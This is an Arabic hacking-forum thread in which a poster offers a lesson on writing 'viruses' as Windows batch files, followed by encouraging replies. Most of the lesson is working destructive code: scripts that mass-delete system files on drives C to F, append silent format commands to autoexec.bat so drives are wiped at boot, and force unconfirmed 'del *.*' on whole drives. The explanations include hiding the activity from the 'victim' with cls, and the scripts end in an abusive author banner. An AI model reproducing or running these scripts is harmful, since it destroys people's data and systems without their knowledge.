•·.· سلــ ــ ــسله عــ ــ ــالم الفيروســـ ـــات ·.·•

•·.· سلــ ــ ــسله عــ ــ ــالم الفيروســـ ـــات ·.·•

اخوتي واحبتي في الله

موضوعي هذا هو بدايه لسلسله في عالم الفيروسات ساشرحها

انشاءالله واتمنى ان يستفاذ منها

•·.· سلــ ــ ــسله عــ ــ ــالم الفيروســـ ـــات ·.·• 40e4b80bc6

وشكرا

***

تسلم اخي ..

ويجب على الجميع ان يكون عنده فكره عن عالم الفيروسات .. خاصةُ اننا جميعاُ من رواد الإنترنت .. ومعرضين لمخاطرها

وبإنتظار السلسله ...

وجزاك الله كل خير ونور دربك

[/center]

زائر

مشكور اخي ومنتضرين سلسلتك لاني من قبل شهرين بس قررت اهتم بعلم الفيروسات والهكر

ومنتظر سلسلك اخي

جميع الفيروسات المتداولة خاصيتها هجومية وهي تنقسم إلى فئتان

الفئة الأولى الحميدة :

فقط تقوم بتبطئة جهاز الكمبيوتر عندما يتم تشغيل البرنامج الذي يحملها، ومنها تقوم بتعطيل الملف التشغيلي للبرنامج الذي يحملها، كما هناك نوع يقوم بإظهار شكل معين على شاشة الكمبيوتر لإرباك المستخدم فقط، وتلك الأنواع من الفيروسات ممكن بأن نسميها الحميدة حيث يمكن التعامل معها بإستخدام برامج الحماية المتداولة في الأسواق لمعرفة موقعها وثم مسح الملف الذي تحمله ومن ثم إعادة نسخ ذلك الملف من نسخة نظيفة .

•·.· سلــ ــ ــسله عــ ــ ــالم الفيروســـ ـــات ·.·• 40e4b80bc6

الفئة الثانية الخطرة أو المدمرة :

فقط تقوم تقوم بتدمير جهاز الكمبيوتر حيث أنها تقوم بتدمير جميع المعلومات والبرامج وتدمير الاسطوانة الصلبة (Hard Disk) وهذه هي الخطيرة وهي ثلاث أنواع .

** النوع الأول: **
مجرد دخوله في جهاز الكمبيوتر يقوم بالتدمير المفاجئ السريع.

** النوع الثاني: **
يسكن في ذاكرة الكمبيوتر ينتظر تاريخ معين ليقوم بتدمير مفاجئ وسريع للكمبيوتر.

** النوع الثالث: **
لا يسكن في الذاكرة بل يسكن في الـ Bios – CPU أو في مواقع عدة داخل Motherboard أو داخل الاسطوانة الصلبة Hard Disk وعندما تشغل الكمبيوتر يقوم إما بالتأكد من تاريخ اليوم فإن لم يكن هو التاريخ المنتظر يخرج من الذاكرة حيث لن تشعر بوجوده وإن كان هو التاريخ المنتظر يقوم بتدمير سريع ومفادئ وهذه أسميها الذكية الخطرة. •·.· سلــ ــ ــسله عــ ــ ــالم الفيروســـ ـــات ·.·• 40e4b80bc6

***
يتبع

بصراحة اخي القيصر انا من المبتدئين في علم الفيروسات رغم اني احب هذا العلم بس بنية شريفة واتمنى ان توافيني اول بأول واكثر ويعطيك الف عافية

•·.· سلــ ــ ــسله عــ ــ ــالم الفيروســـ ـــات ·.·• Vba5155

•·.· سلــ ــ ــسله عــ ــ ــالم الفيروســـ ـــات ·.·• Vba5155

تسلم اخي

واتمنى ان يتابع الجميع موضوعك

الله يوفقك وينور دربك

مشكور اخي القيصر على التوضيح الجميل و المستمر

منتظرين جديدك اخي

الله يعطيك العافية اخي

بسـ ـــ ــم الله الرحمن الرحيـــ ـ ـــم

درس لعشــــــــ ـ ــاق الفيروســــ ـــات

هذي اكواد فيروسات مع الشرح

اولاٌ : كيفية تصميم فايروسات عن طريق الدوس

هنا يجب ان تعرف ان فايروسات الدوس ليست إلا بعض الاوامر المقدمه
والتي تقوم بمسح ملفات السستم من اجل ان تبطل عمل الويندز

مثال : لو اردت ان امسح ملفات معينه يكون الامر المستخدم

del اسم الملف . المسار
بحيث يكون
del file name.exe or dll او اي مسار

مثال لتصميم فايرس صغير يدمر الويندز

-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
del C:\windows\*.ini *.exe *.scr *.txt *.log
del C:\windows\system32\ *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
del C:\windows\system\ *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll

------------------------------------------------------------------------------------------------------نهاية الكود-------------------------------------------------------------------

================================================== =======================
================================================== =======================

الحين راح اشرح لكم امر الفايرس بالتفصيل المملل

اول شي قدمه امر
@del ( لمسح الملفات )

ثاني شي حدد المكان الموجوده فيه الملفات
C:\windows\
C:\windows\system32
C:\windows\system\
هذه اهي الاماكن الموجوده فيها الملفات

ثالث شي قدمه نوع المساسرات الي يجب ان تنمسح
وهذه طريقه جديد وحلوه

لو كنه نبي نمسح ملف ويكون مساره
exe
انحط
*.exe
وعلامة
*.
تعني مسح جميع الملفات التي تحمل المسار المحدد
والمسار اهو exe او اي مسار ثاني
يعني وقت نبي انصمم فايرس لاختصار الوقت والحجم والكتابه وعوار الراس انحط
*.exe
*.scr
*.ini
*.sys
*.nls
*.dll
بهذه الطريقه عطين امر بمسح الملفات ذات مسارexe.scr.ini.sys.nls.dll
مهما كان اسم الملف فهذا الشي غير مهم ما دام يحمل احد هذه المسارات سيمسح

ــــــــــــــــــــــــــــــــ فيروس القاتل ــــــــــــــــــــــــــ
وعمل الفايرس هو مسح الويندز بالكامل

بشرحه لكم وانشالله راح يوضح لكم طريقة التصميم هذا الشرح

-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
Cls
del *.exe
del *.scr
del *.ini
del *.txt
del *.dll
del *.dat
del *.sys
del *.bmp
del *.gif
del *.jpg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd system
Cls
del *.manifest
del taskmgr.exe
del *.dll
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
Cls
del *.wsc
del *.oca
del *.msc
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
del *.acm
del *.dat
del *.HLP
Cls
del *.sve
del *.tha
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *.chk
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
cd ..
@del *.dll
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
cd system32
Cls
del *.manifest
del taskmgr.exe
del *.dll
Cls
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
Cls
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
Cls
del *.acm
del *.dat
del *.HLP
del *.sve
del *.tha
Cls
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *.chk
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
Cls
cd ..
@del *.dll
@echo off
echo Fuck u( >>010<<)
echo he kille u pc donot trea
echo if the virs he did not find the system file
echo u fuck he will find hem now
@del C:\windows\*.ini
Cls
@del C:\windows\*.exe
Cls
@del C:\windows\*.com
Cls
@del C:\windows\system32\*.exe
Cls
@del C:\windows\system32\*.sys
Cls
@del C:\windows\system32\*.log
Cls
@del C:\windows\system32\*.drf
Cls
@del C:\windows\system32\*.scr
Cls
@del C:\windows\system32\*.dll
Cls
@del C:\windows\system32\*.ini
Cls
@del c:\windows\system\*.exe
Cls
@del c:\windows\system\*.sys
Cls
@del c:\windows\system\*.log
Cls
@del c:\windows\system\*.drf
Cls
@del c:\windows\system\*.scr
Cls
@del c:\windows\system\*.dll
Cls
@echo off
echo Fuck u( >>010<<)
@del d:\windows\*.ini
Cls
@del d:\windows\*.exe
Cls
@del d:\windows\*.com
Cls
@del d:\windows\system32\*.exe
Cls
@del d:\windows\system32\*.sys
Cls
@del d:\windows\system32\*.log
Cls
@del d:\windows\system32\*.drf
Cls
@del d:\windows\system32\*.scr
Cls
@del d:\windows\system32\*.dll
Cls
@del d:\windows\system32\*.ini
Cls
@del d:\windows\system\*.exe
Cls
@del d:\windows\system\*.sys
Cls
@del d:\windows\system\*.log
Cls
@del d:\windows\system\*.drf
Cls
@del d:\windows\system\*.scr
Cls
@del d:\windows\system\*.dll
Cls
@echo off
echo Fuck u ( >>010<<)
@del e:\windows\*.ini
Cls
@del e:\windows\*.exe
Cls
@del e:\windows\*.com
Cls
@del e:\windows\system32\*.exe
Cls
@del e:\windows\system32\*.sys
Cls
@del e:\windows\system32\*.log
Cls
@del e:\windows\system32\*.drf
Cls
@del e:\windows\system32\*.scr
Cls
@del e:\windows\system32\*.dll
Cls
@del e:\windows\system32\*.ini
Cls
@del e:\windows\system\*.exe
Cls
@del e:\windows\system\*.sys
Cls
@del e:\windows\system\*.log
Cls
@del e:\windows\system\*.drf
Cls
@del e:\windows\system\*.scr
Cls
@del e:\windows\system\*.dll
@echo off
echo Fuck u ( >>010<<)
@del f:\windows\*.ini
Cls
@del f:\windows\*.exe
Cls
@del f:\windows\*.com
Cls
@del f:\windows\system32\*.exe
Cls
@del f:\windows\system32\*.sys
Cls
@del f:\windows\system32\*.log
Cls
@del f:\windows\system32\*.drf
Cls
@del f:\windows\system32\*.scr
Cls
@del f:\windows\system32\*.dll
Cls
@del f:\windows\system\*.exe
Cls
@del f:\windows\system\*.sys
Cls
@del f:\windows\system\*.log
Cls
@del f:\windows\system\*.drf
Cls
@del f:\windows\system\*.scr
Cls
@del f:\windows\system\*.dll
@pause
@echo off
echo Fuck u( >>010<<)
echo [killer virs_v1] By DosMan [Q8_KOL@HOTMAIL.COM]
echo if u found u pc has been fuck in theis virs u shoud now ther
echo are one man he can do that DosMan if u want virs fucker pc
echo like thet Die you mother fuckers
echo ha ha ha ha [Q8_KOL@HOTMAIL.COM]
@pause
:exit
-------------------------------------------------------------------------------نهاية الكود--------------------------------------------------------------------------

والحين شرح الكود

امر
..cd

هو امر الرجوع للمفات للوراء

وتم استخدمامه لسبب واحد

اول ما سيتم فتح الملف سيدخل الفايرس لمفات الوندز من دون الحاجه من تحديد المسار
يعني اذا كان الوندز في
c: او d:او f:او e:
راح يصيده يعني راح يصيده لان هذا الامر يخلي الفايرس يرجع لان يوصل لملف الوندز

يعني مثلنا انا اول ما افتح شاشة الدوس تطلع لي هذا الشي

--------------------------------------- D:\Documents and Settings\HITLER>
-----------------------------------------<
تنفتح شاشة الدوس بهذا الشكل ويطلع لي هذا المسار

الحين شنو الامر الي لازم احط من اجل الوصول إلى ملف
windows او system او system32
الامر
cd ..
اكتبه اكثر من مره من اجل الوصول إلى الملفات المطلوبه
اكتبه اكثر من مره من اجل الوصول إلى الملفات المطلوبه

وللتذكير هذا الامر يستخدم للرجوع للوراء والفائده من الوصول إلى الملفات المطلوبه مهما كان المكان
الذي تم فيه فتح الفايرس

امر
cd WINDOWS
او
cd system32
او
cd system

يستخدم هذا الامر من اجل الدخول إلى الملف المطلوب

cd اسم الملف الي تبي تدخله

cd name the file u want open in dos

ويتم دخلول الملفات بعد تعين المسار المطلوب ومثل ما ترون
قدم قدمنا امر الرجوع من اجل الوصول إلى ملفات الوندز ومن ثم كتبنا اسم الملفات التي نريد ان ندخلها

بالاوامر الموجد

امر
Cls
امر تنضيف شاشة الدوس
تم استخدام هذا الامر من اجل جعل الاوامر تنفذ بسرعه ومن دون شعور الضحيه بالاوامر التي مرت عليه

del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
اعتقد ان تم شرح هذا الامر من قبل
ولا تنسون هذا الامر لمسح الملفات التي على هذه المسارات فان كنت
تريد ان تعرف كيفيه مسح ملف محدد فما عليك إلا كتابه
del file name.exe او dll او اي مسار
ويجب ان يكون الملف الذي تريد حذفه محدد المسار عن طريق شاشة الدوس

يعني لازم نكتب امر المسح اول شي ومن ثما اسم الملف المطلوب مسحه ومن ثم مسار الملف

امر @echo off

امر ستخدم من اجل كتابة اوامر تنفذ على شاشة الدوس او من اجل ظهور الكتابه على شاشة الدوس
@echo off

echo اكتب هنا الاوامر او اكتب ما تريد ان يظهر على شاشة الدوس

بعدين مثل ما اجوفون تم تحديد مسارات الملفات بذكر اسم المحرك c: // d: // e: // f: //

والسبب ان وندزي بالدي ووقت شغلت الفايرس بالسي ما صاد الملفات
يعني اذا قدمتو الفايرس بملف ون زب وكان وندزه غير موجود على السي راح يفلت من الفايرس ولهذا
السبب تم تحديد المسارات مع وضع امر المسح الكلي للمسارات دون اسم الملف

بمعني اخر ان تم تشغيل الفايرس بالكمبيوتر سيتم تدمير الجهاز ولاكن اذا تم تشغيل الفايرس بالسي ووندزه غير
موجود بالسي ما راح يصيد الملفات
بس الحين بعد التعديل راح يصيدها يعني شي اكييد الجهاز ما يتصلح إلا إذا تفرمت

-----------------------
شرح كود فايرس اخر-
----------------------

----------------------------------------&##1575;لكود-----------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
----------------------------------------------------------------نهاية الكود-------------------------------------------------------------------

شرح الكود

echo format c: /q /u /autotest >nul >>c:\autoexec.bat

echo من اجل الكتابه

format c: /q /u / امر فرمات

اسم حق الامر من اجل وضعه بملف autotest

nul [ عملية مضاعفه لامر الفرمات [ من اجل جعل الامر مرتين بدل مره واحده

c:\autoexec.bat المكان الذي سيتم الحفظ فيه بجهاز الضحيه

وتم اختيار اسم autoexec

من اجل ان يعمل الفايرس من تلقاء نفسه

واذا قمت بكتابة كود الفايرس بنوته باد ومن ثم تغير مسار النوته إلى bat

وفتح الملف سوف تجد ملفات باسم

autoexec موجود في c:

لان تم تحديد مكان الحفظ في السي

وستكون الاوامر بهذا الشكل

format c: /q /u /autotest
format c: /q /u /autotest

وظهرت الاوامر بهذا الشكل لاننا كتبنا في الكود nul

ولهذا السبب تم مضاعفة الامر في الملف الذي عمله الفايرس نسخه في السي

ومثل ما ترون تم مضاعفة الامر الذي شرحته لكم اكثر من مره

------------------------------
كود فايرس اخر

-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
@echo off
ATTRIB -a -s -h -r c:\*.*
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y |del c:\*.*
Echo y | echo a | Echo y |del d:\*.*
Echo y | echo a | Echo y |del e:\*.*
echo y | copy *.* c:\
echo y | copy *.* D:\
echo y | copy *.* E:\
restart

------------------------------------------------------------------------------------------------------نهاية الكود-------------------------------------------------------------------

شرح الكود

بالاول حبين ان اوضح لكم ان عندما تقدم امر
*.*
وهو امر لمسح كل الملفات الموجود بالمجلد الذي حددته بشاشة الدوس

ستظهر رساله تطلب من الموافقه على هذا الامر

للتوضيح

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat>cd n

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n>del *.*
C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n\*.*, Are you sure (Y/N)? y

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n>

مثل ما ترون عندما تم الطلب مسح جميع الملفات الموجوده في مجلد n

خرجة لي رساله من اجل التأكد من موافقتي Are you sure (Y/N)

وبعد الظغط على

y

تم المسح

ولاكن ما هي الطريقه المتبعه من اجل تفادي هذه الرساله اذا كنا نريد ان نعمل فايرس بأوامر الدوس

الحل موجود بكود الفايرسالذي قدمته لكم

امر

Echo y | echo a | Echo y |del *.*

يستخدم لمسح جميع الملفات من دون الطلب

وطريقة استخدام الامر تتم بعد تحديد مسار الملف الذي تريد دخوله عن طريق الدوس ومن ثم كتابة الامر

ومن ثم يتم المسح

ولاكن الذي يوجد به هذا الكود ان تم تحديد المسار

Echo y | echo a | Echo y |del c:\*.*

ومثل ما هو ظاهر ان تم تحديد مسح جميع الملفات التي في المحرك c:

وتم كتابة مثل هذا الامر في كود الفايرس ولاكن من اجل مسح المحركات الاخري

وكان ذالك بتحديد المحركات مثل ما ترون

فتم تحديد المحرك
c:
d:
e:
من اجل ان يتم حذف جميع الملفات التي فيه

والامر الذي بعد الامر الحذف هو امر نسخ جميع الملفات

echo y | copy *.*

وهذا الامر يعطي امكانيه نسخ جميع الملفات من دون خروج رسالة الموافقه مثل التي مبينه عندكم

*.*, Are you sure (Y/N)? y

ولاكن بكود الفايرس تم تحديد المسارات مثل ما ترون
c:
d:
e:

وبذالك نكون شرحنه هذا الكود

================================================== =======================
قبل انهاء الدرس الاول بالدوس حبيت اذكركم ان بعد ان يتم كتابة الاوامر في نوته باد

يتم تغير المسار إلى bat

تم انتهـــ ــاء الـــدرس...يتبع